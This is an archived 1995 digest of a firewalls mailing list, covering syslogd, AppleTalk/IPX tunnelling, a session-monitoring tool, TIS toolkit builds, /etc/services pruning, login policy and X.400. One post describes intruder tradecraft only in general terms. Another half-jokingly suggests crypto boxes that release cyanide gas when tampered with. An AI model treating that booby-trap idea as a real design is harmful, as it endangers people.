Wed Aug 2 14:32:21 1995 Received: (from smap@localhost) by dag.wfnx.com (8.6.12/8.6.9) id RAA13485 for ; Wed, 2 Aug 1995 17:26:24 -0400 Received: from mark.wfnx.com(206.64.193.15) by dag.wfnx.com via smap (V1.3) id sma013467; Wed Aug 2 17:25:56 1995 X-Sender: saltzman@dag Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 2 Aug 1995 17:31:41 -0500 To: firewalls@GreatCircle.COM From: saltzman@shore.net (Mark Saltzman) Subject: appletalk and ipx dangers? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Aug 2 21:31:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA17081 for firewalls-outgoing; Wed, 2 Aug 1995 21:08:26 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA17073 for ; Wed, 2 Aug 1995 21:08:24 -0700 Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma017062; Wed Aug 2 21:07:13 1995 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA05750; Thu, 3 Aug 95 13:34:43 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA25875; Thu, 3 Aug 1995 13:32:28 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9508030402.AA25875@bunya.awadi> Subject: Re: Problems with making / read-only To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 13:32:29 +0930 (CST) X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FWIW I thought I would follow up on my message about syslogd wanting a writable /dev/log A lot of people have suggested trying a symbolic link - this does not work (at least with the Sun syslogd) because syslogd recreates the /dev/log entry when it starts up and does not follow the link when it does this. Sym linking /dev/log to where the syslogd puts the device works fine for the syslog clients but not for syslogd. Thanks for everyone's time. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Wed Aug 2 23:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA20797 for firewalls-outgoing; Wed, 2 Aug 1995 22:36:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA20719 for ; Wed, 2 Aug 1995 22:36:18 -0700 Received: from dkuug.dk(193.88.44.89) by miles via smap (V1.3) id sma020663; Wed Aug 2 22:35:43 1995 Received: from DialupEudora (login.dknet.dk) by dkuug.dk with SMTP id AA26175 (5.65c8/IDA-1.4.4j for ); Thu, 3 Aug 1995 07:34:42 +0200 Date: Thu, 3 Aug 1995 07:34:42 +0200 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Eudora 2.0.1 X-Charset: ASCII X-Char-Esc: 29 To: firewalls@greatcircle.com From: lbe@login.dknet.dk (Lars Bertelsen) Subject: RE: appletalk and ipx dangers? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk marc@bbb.com.au writes: >>Watch out for IPGATEWAYs. If you run MacIP encapsulation or IPX encapsulation >>on that access server, you will effectively be bypassing any firewalling of >>IP. >>Unscreened IP packets can then pass into your corporate net using the other >>protocols as transport. >> >>Cheers, >>Marc Bailey >>__________________________________________________________________________ >>_____ >From: Mark Saltzman on Thu, 3 Aug, 1995 9:03 AM >Subject: appletalk and ipx dangers? >To: firewalls@GreatCircle.COM > >Does anyone see any danger in allowing ipx and appletalk traffic to be >routed through my firewall? (cut!) Well, that is both true and untrue, isn't it? I suppose if the IP gateway that users connect to at dial-in time runs ON the firewall machine, then users who use this service might be able to use this mechanism to bypass the firewall. Users from the Internet wouldn't be able to, though, since the router to the internet wouldn't have to route IPX/Apletalk. One thing to be aware of is that if there is an IP-gateway running inside the firewall in any Appletalk zone then a user would be able to change his setup at home to get his IP address from that one instead of the one running in the unsafe zone. That of course would give him unlimited access to the internal network and be entirely unsafe! lbe@login.dkuug.dk Lars Bertelsen Gartnervang 29 Roskilde, DK From firewalls-owner Wed Aug 2 23:15:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA20443 for firewalls-outgoing; Wed, 2 Aug 1995 22:33:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA20264 for ; Wed, 2 Aug 1995 22:32:50 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma020224; Wed Aug 2 22:32:24 1995 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id PAA11251 (8.6.12/IDA-1.6 for firewalls@greatcircle.com); Thu, 3 Aug 1995 15:31:20 +1000 Received: by junkers.lochard.com.au id AA52702 (5.65c/IDA-1.5 for firewalls@greatcircle.com); Thu, 3 Aug 1995 14:48:56 +1100 From: Mark Message-Id: <199508030348.AA52702@junkers.lochard.com.au> Subject: Re: IPWatcher To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 14:48:55 +1000 (E ) Content-Type: text Content-Length: 1638 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >1) Log, for evidence purposes, his actions >2) Determine what holes he is exploiting >3) Determine what machines he has exploited so you can direct your cleanup > efforts, and get an idea of how much damage has been done >4) Monitor a suspicious user in realtime, and be able to terminate that >user's connection in realtime. This is little use when the attacker sends in a binary that opens an encrypted session for them, be it a shell on a port or whatever. It is SOP these days not to send in source code to a site but to precompile it and insert the binary. If the user gained entry via a sniffed passwd etc or a hijacked session and then installed their encrypted link, any software that isnt running on the host (and this can be defeated as well) will only see the encryption initiation and stream. The real breakin files are sent inband over the encrypted stream. No real information about holes exploited or activities done is gained. Tools such as this have existed for some time and are used where the threat of detection is high or absolute privacy must be maintained. Generally the intrusion is never detected and wont be until the OS is upgraded, and even then the evidence is usually destroyed in the process. To be frank I have little regard for this sort of tool, all you are going to do is infringe on individuals privacy and lower your own morality. Power corrupting and all that. I can see far too many admins getting nosey about what that cute redhead in the corner is doing and watching her sessions. The instance of tools like this being used on actual legit work would be quite low. Mark mark@lochard.com.au From firewalls-owner Thu Aug 3 01:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25097 for firewalls-outgoing; Thu, 3 Aug 1995 00:35:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25089 for ; Thu, 3 Aug 1995 00:35:08 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma025082; Thu Aug 3 00:34:51 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTMR5QMYMO0006D3@amc.uva.nl>; Thu, 3 Aug 1995 09:33:49 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA16465; Thu, 3 Aug 1995 09:33:46 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00948; Thu, 3 Aug 1995 09:33:45 +0200 Date: Thu, 03 Aug 1995 09:33:45 +0200 Subject: TIS on solaris 2.4? To: firewalls@greatcircle.com Message-id: <9508030733.AA00948@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 479 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am compiling the TIS toolkit on solaris 2.4. The compiler is complaining about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist. Anybody some ideas? Frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-329 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662917 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Thu Aug 3 01:24:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25674 for firewalls-outgoing; Thu, 3 Aug 1995 00:56:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25666 for ; Thu, 3 Aug 1995 00:56:32 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma025649; Thu Aug 3 00:56:20 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTMRWANQAO0006EC@amc.uva.nl>; Thu, 3 Aug 1995 09:55:13 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA16556; Thu, 3 Aug 1995 09:55:10 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA01467; Thu, 3 Aug 1995 09:55:04 +0200 Date: Thu, 03 Aug 1995 09:55:04 +0200 Subject: Re: TIS on solaris 2.4? To: firewalls@greatcircle.com Message-id: <9508030755.AA01467@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 683 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> From wetzels Thu Aug 3 09:33:44 1995 fpmw> To: firewalls@greatcircle.com fpmw> Subject: TIS on solaris 2.4? fpmw> fpmw> I am compiling the TIS toolkit on solaris 2.4. The compiler is complaining fpmw> about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist. fpmw> fpmw> Anybody some ideas? Sorry, found it. in sys/sockio.h Propably a braindead `grep' ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-329 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662917 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Thu Aug 3 02:30:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA28854 for firewalls-outgoing; Thu, 3 Aug 1995 02:06:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA28839 for ; Thu, 3 Aug 1995 02:05:56 -0700 Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma028790; Thu Aug 3 02:04:51 1995 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id LAA11261; Thu, 3 Aug 1995 11:02:09 +0200 Date: Thu, 3 Aug 1995 11:02:09 +0200 Message-Id: <199508030902.LAA11261@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Thomas V. Myers" From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: Multilevel systems Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tom wrote: >It would seem that you need unique public/private key pairs for each machine >and that each machine on the 'virtual Z' network would have to have the >public key for every other machine on that virtual network. Distributing >these keys in the first place (when the network is still unsecure) would >seem to be a nightmare (sniffing-spoofing, etc). > > (amateur opinion, use with caution), Tom I obviously did not express this clearly: All machines on virtual network Z will be able to understand communication from all other machines on this virtual net and to transmit to all other machines on net Z. However, no communication between machines on different virtual networks is initially possible. Thus the solution lends itself to symmetric crypt like DES and you would not use public/private key pairs to run the network itself. Obviously, if you wish to add privacy to communication from machine Z(n) to machine Z(m) you can stick an assymetric crypt algo on top. Practically I think a good way to implement this would be to use special NICs incorporating small secured boxes (you could use external crypt boxes, but that would most likely mean that short pieces of external cable would carry unencrypted info). If you really want to secure this you could add small pressurised cartridges containing cyan gas, you know, the nice-smelling stuff that adversely affects breathing when hitting humid lung tissue, releasing the gas if tampered with. To deter everybody you could stick warnings on the outside of the boxes, and then again, to effectively deter the ones you REALLY would want to deter, you could refrain from doing so... Nasty. In any case I can think of a number of elegant was to initialise this type of system, and even to change keys regularly in a self-synchronising manner. This whole solution is so obvious that it must have been implemented (somewhat similar solutions exist e.g. for bank WANs). Anybody know of actual products built on the principles discussed? Rgds, Niels ------------------------------------------------------------------------ -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- ------------------------------------------------------------------------ From firewalls-owner Thu Aug 3 02:47:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA29338 for firewalls-outgoing; Thu, 3 Aug 1995 02:25:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA29319 for ; Thu, 3 Aug 1995 02:25:12 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma029314; Thu Aug 3 02:24:48 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id KAA07695 for ; Thu, 3 Aug 1995 10:19:18 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id KAA06922 for ; Thu, 3 Aug 1995 10:23:42 +0100 From: Danny Cox Date: Thu, 3 Aug 1995 10:20:58 +0100 Message-Id: <3568.9508030920@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: A couple of others in services ? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry - I forgot these - ought I to keep the kerberos ports 750/udp 750/tcp or the rje port (what is this) 77/tcp ? Thanks again, Danny From firewalls-owner Thu Aug 3 03:01:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA29252 for firewalls-outgoing; Thu, 3 Aug 1995 02:22:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA29228 for ; Thu, 3 Aug 1995 02:22:03 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma029218; Thu Aug 3 02:21:31 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id KAA07692 for ; Thu, 3 Aug 1995 10:15:41 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id KAA06757; Thu, 3 Aug 1995 10:19:47 +0100 From: Danny Cox Date: Thu, 3 Aug 1995 10:17:02 +0100 Message-Id: <3565.9508030917@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: /etc/services on Solaris Cc: dannyc@gmap3 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for various comments regarding cc:Mail etc. If anyone else has opinions I look forward to hearing them. I'm going through my /etc/services file again (Solaris 2.3). The FW+Inet Security bible makes a load of recommendations about what to allow - however it doesn't consider all the entries in the default solaris services file, viz name 42/udp nameserver rje 77/tcp hostnames 101/tcp hostname # usually to sri-nic iso-tsap 102/tcp x400 103/tcp x400-snd 104/tcp csnet-ns 105/tcp printer 515/tcp courier 530/tcp new-rwho 550/tcp #experimental rmonitor 560/udp #experimental pcserver 600/tcp #experimental ingreslock 1524/tcp lockd 4045/udp #NFS lock daemon/manager lockd 4045/tcp #NFS lock daemon/manager I'm inclined to take all of these out. I'm slighly wary as to whether I'm going to shoot myself in the foot by doing so however, as I don't really know what half of these do! We don't have any need for X.400 mail; I'm not running a printer or NFS from my firewall either. And needless to say I'm not running Ingres on it!!! Anyone comment upon whether I should keep any of these ? Thanks all again, Danny From firewalls-owner Thu Aug 3 10:08:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01207 for firewalls-outgoing; Thu, 3 Aug 1995 09:32:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00796 for ; Thu, 3 Aug 1995 09:31:56 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma000301; Thu Aug 3 09:30:03 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id IAA22775; Thu, 3 Aug 1995 08:50:46 -0700 Message-Id: <199508031550.IAA22775@mycroft.GreatCircle.COM> Received: from unknown(150.203.76.24) by mycroft via smap (V1.3mjr) id sma022765; Thu Aug 3 08:50:17 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA183375181; Fri, 4 Aug 1995 01:53:01 +1000 From: Darren Reed Subject: preventing password accidents. To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Fri, 4 Aug 1995 01:53:01 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1608 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Whilst this may not be strictly a subject for firewalls, and maybe more comp.security.misc, I believe it bears more relevance to firewalls...O:) In the many attempts to stop passwords being sent over the clear when dialing from remote locations, none of them actually do anything to stop it being typed. God knows I've done it on occasion... What I'd like to propose is that firewalls and other systems which require the use of reuseable passwords take preventative measures, to stop a potentially harmful/critical password being entered across an insecure medium. ie if it sees the username "root" given to the "login:" prompt, it drops the connection immeadiately with no "Password:" prompt sent back. And it does the same for anyone who has a trusted account (ie group wheel, etc). You may wish to alter this policy for ssh/STEL/deslogin accesses, as appropriate. What I'm aiming to solve here is the "oh, just let me login, oops, forgot to use skey, let me retype that" and similar, where although the password may not necessarily give an outsider access, if they snoop'd that password, it's a little bit easier. I've considered that it does provide some information that the account is trusted (ie a potentialally richer target for leading to a breakin) but to my mind, this gives much better protection - not even allowed to guess the password, even if you might be right. If something already has this behaviour, please point me at it, but as far as I am aware, nothing will stop you entering a password if you have already entered a username, especially if it is valid. Thoughts ? darren From firewalls-owner Thu Aug 3 10:10:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01208 for firewalls-outgoing; Thu, 3 Aug 1995 09:32:55 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00985 for ; Thu, 3 Aug 1995 09:32:17 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smay00301; Thu Aug 3 09:30:26 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id IAA22749; Thu, 3 Aug 1995 08:47:46 -0700 Received: from egon.wokingham.luna.net(193.118.188.4) by mycroft via smap (V1.3mjr) id sma022743; Thu Aug 3 08:47:21 1995 Received: from axsis.co.uk (28-static-a.wokingham.luna.net [193.118.163.28]) by egon.wokingham.luna.net (8.6.12/8.6.12) with SMTP id QAA24607; Thu, 3 Aug 1995 16:45:29 +0100 Date: Thu, 3 Aug 95 16:28:28 PDT From: Greg Wynne Subject: RE: Protecting X.400 anyone? To: Bill Bunting , firewalls@greatcircle.com X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 1 Aug 1995 15:55:11 -0400 Bill Bunting wrote: > >Can anyone answer some/all of the following about X.400 in a firewalled >environment. My best try at the questions. >* What are the best methods to protect X.400 and X.500? Depends what you want to protect them against, whether you are woried about them as an entry point to your system or against malicous X.400 and X.500 connections. In terms of a hacking threat then the base systems offer little scope for threats although remote interfaces may be a problem in some products. An X.400 MTA-MTA connection (P1) has no human interface and the P1 protocol in my opinion does not consitute a hacking threat as everything is encoded in ASN.1 BER and there is no access to system commands. X.400 user agents or remote user agents may be more of a problem but again all data is ASN.1 BER encoded. X.500 DUAs re similar to X.400 user agents. If you are worried about illegal X.400 or X.500 access then the base protocols make it difficult to forge the originator of a message or request and X.500 in particular has built in access control for the information held in the directory. > >* What is the best source of information on the WWW about X.400/X.500 and >how it relates to firewalls? I know of no source. >* Do you use a proxy for X.400, something like SMAP, or what? I know of no proxy as such, because X.400 MTAs are inherently proxies in some ways but there are secure gateways which check orginator/recipient addresses and can be used to create messaging closed user groups. What is SMAP??? >* What is the comms flow for X.400 using TCP/IP i.e. ports in use and >protocol information? (where is this best documented [RFC ####, http:####] ? RFC 1006 describes the TCP ports to be used. The X.400 protocols are described in the X.400 standards. >* Is there any freeware or public domain source code available to protect >X.400/X.500? Depends what you mean by protect, but I am not specifically aware of any >* Does anyone have any experience they would like to share about X.400/X.500? What aspects are you particularly interested in. >* If I should have to develop and X.400 proxy/protector which public domain >implementation of X.400/X.500 (source code) is available/best? The only public domain software I am aware of was in the Isode package but that has now been removed from the public domain and is managed by the Isode Consortium, there may be old versions around Good luck. ---------------------------------------------------------- Name: Greg Wynne, Axsis Consultants Ltd E-mail: greg@axsis.co.uk WWW: http://www.axsis.co/~axinfo Date: 08/03/95 Time: 16:28:28 ---------------------------------------------------------- From firewalls-owner Thu Aug 3 10:10:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03286 for firewalls-outgoing; Thu, 3 Aug 1995 09:41:42 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03218 for ; Thu, 3 Aug 1995 09:41:28 -0700 Received: from bbdo.com(149.39.1.101) by miles via smap (V1.3) id sma003054; Thu Aug 3 09:40:21 1995 Message-ID: Date: 3 Aug 1995 12:31:47 U From: "David Glosser" Subject: sun rpc activity To: "fw" X-Mailer: Mail*Link SMTP-QM 3.0.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have been logging the following activity: Jul 29 13:34:19 udp 192.99.99.10/3081 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 29 13:34:19 udp 192.99.99.10/3082 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 29 13:34:19 udp 192.99.99.10/3083 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:20:09 udp 192.99.99.10/1199 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:20:10 udp 192.99.99.10/1200 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:20:11 udp 192.99.99.10/1201 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:20:12 udp 192.99.99.10/1202 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:37:42 udp 192.99.99.10/1093 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:37:43 udp 192.99.99.10/1094 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:37:44 udp 192.99.99.10/1095 -> 192.99.99.255/sunrpc 112 !pass (14) Jul 31 14:37:45 udp 192.99.99.10/1096 -> 192.99.99.255/sunrpc 112 !pass (14) Needless to say, our IP addresses are not anywhere near those listed above. Does anyone have any idea what these are? You may e-mail me privately and I will summarize if there is interest. Thanks in advance, David Glosser Glosser@bbdo.com From firewalls-owner Thu Aug 3 10:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03497 for firewalls-outgoing; Thu, 3 Aug 1995 09:46:56 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00734 for ; Thu, 3 Aug 1995 09:30:54 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaeb0301; Thu Aug 3 09:30:00 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id IAA22644; Thu, 3 Aug 1995 08:36:45 -0700 Received: from services.more.net(128.206.1.214) by mycroft via smap (V1.3mjr) id sma022638; Thu Aug 3 08:36:33 1995 Received: by services.more.net (4.1/SMI-4.1) id AA10781; Thu, 3 Aug 95 10:38:11 CDT Date: Thu, 3 Aug 1995 10:38:10 -0500 (CDT) From: "Frank K. Senter" Subject: Re: NetSp wins Trust Award To: Ian Cooper Cc: firewalls@greatcircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A consultant told me that IBM's NetSP SNG is a "circuit gateway" type of firewall, as compared to packet filters or proxy gateways. Can someone explain? Also, I think the consultant may have confused the two "NetSP" products. Any confusion over these separate applications is entirely IBM's fault... Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 From firewalls-owner Thu Aug 3 10:38:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03507 for firewalls-outgoing; Thu, 3 Aug 1995 09:47:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01539 for ; Thu, 3 Aug 1995 09:34:36 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smava0301; Thu Aug 3 09:33:03 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id GAA21073; Thu, 3 Aug 1995 06:30:48 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by mycroft via smap (V1.3mjr) id sma021050; Thu Aug 3 06:30:14 1995 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id XAA05244 (8.6.12/IDA-1.6); Thu, 3 Aug 1995 23:31:13 +1000 Received: by junkers.lochard.com.au id AA15029 (5.65c/IDA-1.5); Thu, 3 Aug 1995 19:48:48 +1100 From: Mark Message-Id: <199508030848.AA15029@junkers.lochard.com.au> Subject: Re: Where are the known "den of thieves" sites ? To: PAWLUK_JEAN@tandem.com Date: Thu, 3 Aug 1995 19:48:48 +1000 (E ) Cc: firewalls@GreatCircle.COM In-Reply-To: <199508021816.AA22329@comm.tandem.com> from "PAWLUK_JEAN@tandem.com" at Aug 2, 95 02:33:00 pm Content-Type: text Content-Length: 359 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Being a newbie I wondered who are these known sites ? Who knows about them ? >Where can I get that info ? I've never seen an alert that says such and >such site or ip address is a known source of trouble so who is passing this >info along ? Are there lists ? I always found cert.org to be constantly involved in computer security breakins. :) sorry, Mark From firewalls-owner Thu Aug 3 11:12:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03568 for firewalls-outgoing; Thu, 3 Aug 1995 09:48:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01544 for ; Thu, 3 Aug 1995 09:34:35 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaxa0301; Thu Aug 3 09:33:05 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id GAA21081; Thu, 3 Aug 1995 06:31:12 -0700 Received: from xetron.com(204.242.42.10) by mycroft via smap (V1.3mjr) id sma021072; Thu Aug 3 06:30:58 1995 Received: (from uucp@localhost) by xetron.com (8.6.10/gw-950515) id JAA07059 for ; Thu, 3 Aug 1995 09:34:07 -0400 Received: from kgw2.xetron.com(129.228.20.253) by gate129.xetron.com via smap (V1.3) id sma007055; Thu Aug 3 09:33:43 1995 Received: (from news@localhost) by kgw2.xetron.com (8.6.10/h-950420) id IAA00735 for firewalls@greatcircle.com; Thu, 3 Aug 1995 08:45:03 -0400 From: "Steele " Subject: Re: TIS on solaris 2.4? Content-Type: text/plain; charset=us-ascii Message-ID: Nntp-Posting-Host: dss_mac.xetron.com Content-Transfer-Encoding: 7bit Organization: Xetron Corp. References: <9508030755.AA01467@amchelix.amc.uva.nl> Mime-Version: 1.0 X-Mailer: Mozilla 1.1N (Macintosh; I; 68K) X-Url: news:9508030755.AA01467@amchelix.amc.uva.nl To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 12:37:13 GMT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk F.Wetzels@amc.uva.nl wrote: >... >fpmw> I am compiling the TIS toolkit on solaris 2.4. The compiler is complaining >fpmw> about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist. .. > >Sorry, found it. in sys/sockio.h > >Propably a braindead `grep' ^ | ..or something like that. Sorry, couldn't resist. From firewalls-owner Thu Aug 3 11:20:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03558 for firewalls-outgoing; Thu, 3 Aug 1995 09:48:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01134 for ; Thu, 3 Aug 1995 09:32:40 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaeb0301; Thu Aug 3 09:31:09 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id HAA22234; Thu, 3 Aug 1995 07:54:17 -0700 Received: from odin.community.net(140.174.119.10) by mycroft via smap (V1.3mjr) id sma022169; Thu Aug 3 07:51:47 1995 Received: from [140.174.226.100] (n100.coco.community.net [140.174.226.100]) by odin.community.net with SMTP id HAA11467; Thu, 3 Aug 1995 07:47:50 -0700 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 07:50:19 -0700 To: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) From: bhusler@community.net (Bill Husler) Subject: Re: Huge gapping hole in Win95 Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 9:42 PM 8/1/95, Stefan Jon Silverman wrote: >Folks: > > Can anybody suggest a software / 